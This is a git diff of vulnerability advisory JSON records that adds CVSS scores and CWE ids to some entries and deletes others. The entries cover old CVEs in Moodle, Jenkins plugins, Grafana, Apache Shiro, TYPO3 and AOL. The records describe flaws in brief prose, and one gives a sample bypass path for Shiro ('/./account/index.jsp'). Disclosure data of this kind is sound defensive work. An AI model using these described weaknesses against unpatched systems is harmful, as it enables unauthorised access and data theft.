- "details": "The KSES text cleaning filter in lib/weblib.php in Moodle before 1.8.13 and 1.9.x before 1.9.9 does not properly handle vbscript URIs, which allows remote authenticated users to conduct cross-site scripting (XSS) attacks via HTML input.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-2230"
- },
- {
- "type": "WEB",
- "url": "https://bugzilla.redhat.com/show_bug.cgi?id=605809"
- },
- {
- "type": "WEB",
- "url": "http://cvs.moodle.org/moodle/lib/weblib.php?r1=1.812.2.114&r2=1.812.2.115"
- },
- {
- "type": "WEB",
- "url": "http://cvs.moodle.org/moodle/lib/weblib.php?r1=1.970.2.171&r2=1.970.2.172"
- },
- {
- "type": "WEB",
- "url": "http://docs.moodle.org/en/Moodle_1.8.13_release_notes"
- },
- {
- "type": "WEB",
- "url": "http://docs.moodle.org/en/Moodle_1.9.9_release_notes"
- },
- {
- "type": "WEB",
- "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043285.html"
- },
- {
- "type": "WEB",
- "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043291.html"
- },
- {
- "type": "WEB",
- "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043340.html"
- },
- {
- "type": "WEB",
- "url": "http://lists.opensuse.org/opensuse-security-announce/2010-08/msg00001.html"
- },
- {
- "type": "WEB",
- "url": "http://moodle.org/mod/forum/discuss.php?d=152368"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/40248"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/40352"
- },
- {
- "type": "WEB",
- "url": "http://tracker.moodle.org/browse/MDL-22042"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2010/06/21/2"
- },
- {
- "type": "WEB",
- "url": 
"http://www.vupen.com/english/advisories/2010/1530"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2010/1571"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-06-28T17:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3gq3-wqjv-f3fj/GHSA-3gq3-wqjv-f3fj.json b/advisories/unreviewed/2022/05/GHSA-3gq3-wqjv-f3fj/GHSA-3gq3-wqjv-f3fj.json
index 91a97830d0720..29357bcd7b617 100644
--- a/advisories/unreviewed/2022/05/GHSA-3gq3-wqjv-f3fj/GHSA-3gq3-wqjv-f3fj.json
+++ b/advisories/unreviewed/2022/05/GHSA-3gq3-wqjv-f3fj/GHSA-3gq3-wqjv-f3fj.json
@@ -65,7 +65,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-862"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-3j45-2pqx-6qf3/GHSA-3j45-2pqx-6qf3.json b/advisories/unreviewed/2022/05/GHSA-3j45-2pqx-6qf3/GHSA-3j45-2pqx-6qf3.json
index 13853c2cc1e59..ffab089e9d675 100644
--- a/advisories/unreviewed/2022/05/GHSA-3j45-2pqx-6qf3/GHSA-3j45-2pqx-6qf3.json
+++ b/advisories/unreviewed/2022/05/GHSA-3j45-2pqx-6qf3/GHSA-3j45-2pqx-6qf3.json
@@ -53,7 +53,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-770"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json b/advisories/unreviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json
deleted file mode 100644
index 2d6c3da10aaba..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3jq7-8ph8-63xm/GHSA-3jq7-8ph8-63xm.json
+++ /dev/null
@@ -1,59 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3jq7-8ph8-63xm",
- "modified": "2022-05-24T17:16:53Z",
- "published": "2022-05-24T17:16:53Z",
- "aliases": [
- "CVE-2020-12458"
- ],
- "details": "An information-disclosure flaw was found in Grafana through 6.7.3. The database directory /var/lib/grafana and database file /var/lib/grafana/grafana.db are world readable. This can result in exposure of sensitive information (e.g., cleartext or encrypted datasource passwords).",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12458"
- },
- {
- "type": "WEB",
- "url": "https://github.com/grafana/grafana/issues/8283"
- },
- {
- "type": "WEB",
- "url": "https://access.redhat.com/security/cve/CVE-2020-12458"
- },
- {
- "type": "WEB",
- "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1827765"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CTQCKJZZYXMCSHJFZZ3YXEO5NUBANGZS/"
- },
- {
- "type": "WEB",
- "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WEBCIEVSYIDDCA7FTRS2IFUOYLIQU34A/"
- },
- {
- "type": "WEB",
- "url": "https://security.netapp.com/advisory/ntap-20200518-0001/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-312",
- "CWE-732"
- ],
- "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2020-04-29T16:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json b/advisories/unreviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json
deleted file mode 100644
index 1c86440a6828a..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3jx9-mgwx-4q83/GHSA-3jx9-mgwx-4q83.json
+++ /dev/null
@@ -1,59 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3jx9-mgwx-4q83",
- "modified": "2022-05-14T02:42:51Z",
- "published": "2022-05-14T02:42:51Z",
- "aliases": [
- "CVE-2010-3863"
- ],
- "details": "Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3863"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/62959"
- },
- {
- "type": "WEB",
- "url": "http://archives.neohapsis.com/archives/fulldisclosure/2010-11/0020.html"
- },
- {
- "type": "WEB",
- "url": "http://osvdb.org/69067"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/41989"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/archive/1/514616/100/0/threaded"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/44616"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2010/2888"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-22"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-11-05T17:00:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json b/advisories/unreviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json
deleted file mode 100644
index 03143c70ae8fd..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3mqf-fwc6-vwqw/GHSA-3mqf-fwc6-vwqw.json
+++ /dev/null
@@ -1,67 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3mqf-fwc6-vwqw",
- "modified": "2022-05-17T01:55:58Z",
- "published": "2022-05-17T01:55:58Z",
- "aliases": [
- "CVE-2010-5098"
- ],
- "details": "Cross-site scripting (XSS) vulnerability in the FORM content object in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5, allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5098"
- },
- {
- "type": "WEB",
- "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/64179"
- },
- {
- "type": "WEB",
- "url": "http://secunia.com/advisories/35770"
- },
- {
- "type": "WEB",
- "url": "http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-sa-2010-022/"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2011/01/13/2"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2012/05/10/7"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2012/05/11/3"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2012/05/12/5"
- },
- {
- "type": "WEB",
- "url": "http://www.osvdb.org/70122"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/45470"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "LOW",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2012-05-21T20:55:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3mr8-9w83-x659/GHSA-3mr8-9w83-x659.json b/advisories/unreviewed/2022/05/GHSA-3mr8-9w83-x659/GHSA-3mr8-9w83-x659.json
index bfee13bd9d917..fa8a94f65f15a 100644
--- a/advisories/unreviewed/2022/05/GHSA-3mr8-9w83-x659/GHSA-3mr8-9w83-x659.json
+++ b/advisories/unreviewed/2022/05/GHSA-3mr8-9w83-x659/GHSA-3mr8-9w83-x659.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3mr8-9w83-x659",
- "modified": "2022-05-24T19:19:13Z",
+ "modified": "2024-02-03T03:30:26Z",
 "published": "2022-05-24T19:19:13Z",
 "aliases": [
 "CVE-2021-41645"
 ],
 "details": "Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field. .",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
diff --git a/advisories/unreviewed/2022/05/GHSA-3p99-663g-4p22/GHSA-3p99-663g-4p22.json b/advisories/unreviewed/2022/05/GHSA-3p99-663g-4p22/GHSA-3p99-663g-4p22.json
index c2a2a6233fcb7..75d69fb04fe81 100644
--- a/advisories/unreviewed/2022/05/GHSA-3p99-663g-4p22/GHSA-3p99-663g-4p22.json
+++ b/advisories/unreviewed/2022/05/GHSA-3p99-663g-4p22/GHSA-3p99-663g-4p22.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3p99-663g-4p22",
- "modified": "2022-05-02T03:47:20Z",
+ "modified": "2024-02-03T03:30:26Z",
 "published": "2022-05-02T03:47:20Z",
 "aliases": [
 "CVE-2009-3658"
 ],
 "details": "Use-after-free vulnerability in the Sb.SuperBuddy.1 ActiveX control (sb.dll) in America Online (AOL) 9.5.0.1 allows remote attackers to trigger memory corruption or possibly execute arbitrary code via a malformed argument to the SetSuperBuddy method.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -49,7 +52,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-416"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json b/advisories/unreviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json
deleted file mode 100644
index 3cb7e335b006c..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3q6p-r6rr-266x/GHSA-3q6p-r6rr-266x.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3q6p-r6rr-266x",
- "modified": "2022-05-14T00:58:29Z",
- "published": "2022-05-14T00:58:29Z",
- "aliases": [
- "CVE-2017-1000113"
- ],
- "details": "The Deploy to container Plugin stored passwords unencrypted as part of its configuration. This allowed users with Jenkins master local file system access, or users with Extended Read access to the jobs it is used in, to retrieve those passwords. The Deploy to container Plugin now integrates with Credentials Plugin to store passwords securely, and automatically migrates existing passwords.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000113"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-08-07/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-200"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-10-05T01:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3qj8-w38x-qmxh/GHSA-3qj8-w38x-qmxh.json b/advisories/unreviewed/2022/05/GHSA-3qj8-w38x-qmxh/GHSA-3qj8-w38x-qmxh.json
index f6271062631f6..0043d6097ca03 100644
--- a/advisories/unreviewed/2022/05/GHSA-3qj8-w38x-qmxh/GHSA-3qj8-w38x-qmxh.json
+++ b/advisories/unreviewed/2022/05/GHSA-3qj8-w38x-qmxh/GHSA-3qj8-w38x-qmxh.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3qj8-w38x-qmxh",
- "modified": "2022-05-01T02:03:35Z",
+ "modified": "2024-02-08T21:30:31Z",
 "published": "2022-05-01T02:03:35Z",
 "aliases": [
 "CVE-2005-1947"
 ],
 "details": "Cross-site request forgery (CSRF) vulnerability in Invision Gallery before 1.3.1 allows remote attackers to delete albums and images as another user via a link or IMG tag to the (1) albums or (2) delimg actions.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
 ],
 "affected": [
 
@@ -29,7 +32,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-352"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json b/advisories/unreviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json
deleted file mode 100644
index 949fca33a731e..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3rrg-p8xc-3457/GHSA-3rrg-p8xc-3457.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3rrg-p8xc-3457",
- "modified": "2022-05-14T03:33:40Z",
- "published": "2022-05-14T03:33:40Z",
- "aliases": [
- "CVE-2018-1000113"
- ],
- "details": "A cross-site scripting vulnerability exists in Jenkins TestLink Plugin 2.12 and earlier in TestLinkBuildAction/summary.jelly and others that allow an attacker who can control e.g. TestLink report names to have Jenkins serve arbitrary HTML and JavaScript",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000113"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-02-26/#SECURITY-731"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-03-13T13:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json b/advisories/unreviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json
deleted file mode 100644
index d98e6588b31b5..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-3vcx-w94h-68vg/GHSA-3vcx-w94h-68vg.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-3vcx-w94h-68vg",
- "modified": "2022-05-14T03:40:06Z",
- "published": "2022-05-14T03:40:06Z",
- "aliases": [
- "CVE-2018-1000055"
- ],
- "details": "Jenkins Android Lint Plugin 2.5 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000055"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2018-02-05/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-611"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2018-02-09T23:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-42cx-qwh9-c3xj/GHSA-42cx-qwh9-c3xj.json b/advisories/unreviewed/2022/05/GHSA-42cx-qwh9-c3xj/GHSA-42cx-qwh9-c3xj.json
index 70204836e539c..6541143e89465 100644
--- a/advisories/unreviewed/2022/05/GHSA-42cx-qwh9-c3xj/GHSA-42cx-qwh9-c3xj.json
+++ b/advisories/unreviewed/2022/05/GHSA-42cx-qwh9-c3xj/GHSA-42cx-qwh9-c3xj.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-42cx-qwh9-c3xj",
- "modified": "2022-05-01T18:01:33Z",
+ "modified": "2024-02-02T03:30:31Z",
 "published": "2022-05-01T18:01:33Z",
 "aliases": [
 "CVE-2007-2237"
 ],
 "details": "Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
+ }
 ],
 "affected": [
 
@@ -57,7 +60,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-369"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json b/advisories/unreviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json
deleted file mode 100644
index adb273651f251..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-449p-7c3p-vf7g/GHSA-449p-7c3p-vf7g.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-449p-7c3p-vf7g",
- "modified": "2022-05-13T01:25:42Z",
- "published": "2022-05-13T01:25:42Z",
- "aliases": [
- "CVE-2019-1003082"
- ],
- "details": "A cross-site request forgery vulnerability in Jenkins Gearman Plugin in the GearmanPluginConfig#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003082"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-991"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-352"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json b/advisories/unreviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json
deleted file mode 100644
index 21731e0527d58..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-45ch-hxgr-vx8j/GHSA-45ch-hxgr-vx8j.json
+++ /dev/null
@@ -1,51 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-45ch-hxgr-vx8j",
- "modified": "2022-05-13T01:13:09Z",
- "published": "2022-05-13T01:13:09Z",
- "aliases": [
- "CVE-2010-1618"
- ],
- "details": "Cross-site scripting (XSS) vulnerability in the phpCAS client library before 1.1.0, as used in Moodle 1.8.x before 1.8.12 and 1.9.x before 1.9.8, allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled in an error message.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-1618"
- },
- {
- "type": "WEB",
- "url": "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html"
- },
- {
- "type": "WEB",
- "url": "http://moodle.org/security/"
- },
- {
- "type": "WEB",
- "url": "http://www.ja-sig.org/issues/browse/PHPCAS-52"
- },
- {
- "type": "WEB",
- "url": "http://www.ja-sig.org/wiki/display/CASC/phpCAS+ChangeLog"
- },
- {
- "type": "WEB",
- "url": "http://www.vupen.com/english/advisories/2010/1107"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2010-04-29T21:30:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json b/advisories/unreviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json
deleted file mode 100644
index e7ad944e5338a..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-45fr-w365-f7pm/GHSA-45fr-w365-f7pm.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-45fr-w365-f7pm",
- "modified": "2022-05-13T01:17:45Z",
- "published": "2022-05-13T01:17:45Z",
- "aliases": [
- "CVE-2019-1003053"
- ],
- "details": "Jenkins HockeyApp Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003053"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-839"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2"
- },
- {
- "type": "WEB",
- "url": "http://www.securityfocus.com/bid/107790"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-311"
- ],
- "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-04-04T16:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json b/advisories/unreviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json
deleted file mode 100644
index 84c80cfc7e108..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-46rr-87h4-f5q6/GHSA-46rr-87h4-f5q6.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-46rr-87h4-f5q6",
- "modified": "2023-10-25T18:31:31Z",
- "published": "2022-05-24T17:03:47Z",
- "aliases": [
- "CVE-2019-16561"
- ],
- "details": "Jenkins WebSphere Deployer Plugin 1.6.1 and earlier allows users with Overall/Read access to disable SSL/TLS certificate and hostname validation for the entire Jenkins master JVM.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16561"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-12-17/#SECURITY-1581"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/12/17/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-295"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-12-17T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json b/advisories/unreviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json
deleted file mode 100644
index 86928b37a6312..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-477r-v22q-r42f/GHSA-477r-v22q-r42f.json
+++ /dev/null
@@ -1,38 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-477r-v22q-r42f",
- "modified": "2022-05-17T00:29:00Z",
- "published": "2022-05-17T00:29:00Z",
- "aliases": [
- "CVE-2017-1000088"
- ],
- "details": "The Sidebar Link plugin allows users able to configure jobs, views, and agents to add entries to the sidebar of these objects. There was no input validation, which meant users were able to use javascript: schemes for these links.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000088"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2017-07-10/"
- }
- ],
- "database_specific": {
- "cwe_ids": [
- "CWE-79"
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2017-10-05T01:29:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json b/advisories/unreviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json
deleted file mode 100644
index 84a0960961d17..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-47rr-8vrp-9283/GHSA-47rr-8vrp-9283.json
+++ /dev/null
@@ -1,42 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-47rr-8vrp-9283",
- "modified": "2023-10-25T18:31:24Z",
- "published": "2022-05-24T16:52:45Z",
- "aliases": [
- "CVE-2019-10375"
- ],
- "details": "An arbitrary file read vulnerability in Jenkins File System SCM Plugin 2.1 and earlier allows attackers able to configure jobs in Jenkins to obtain the contents of any file on the Jenkins master.",
- "severity": [
- {
- "type": "CVSS_V3",
- "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
- }
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10375"
- },
- {
- "type": "WEB",
- "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-569"
- },
- {
- "type": "WEB",
- "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": "MODERATE",
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2019-08-07T15:15:00Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json b/advisories/unreviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json
deleted file mode 100644
index 9070443a02127..0000000000000
--- a/advisories/unreviewed/2022/05/GHSA-492x-gfqx-wpf3/GHSA-492x-gfqx-wpf3.json
+++ /dev/null
@@ -1,46 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-492x-gfqx-wpf3",
- "modified": "2022-05-13T01:17:42Z",
- "published": "2022-05-13T01:17:42Z",
- "aliases": [
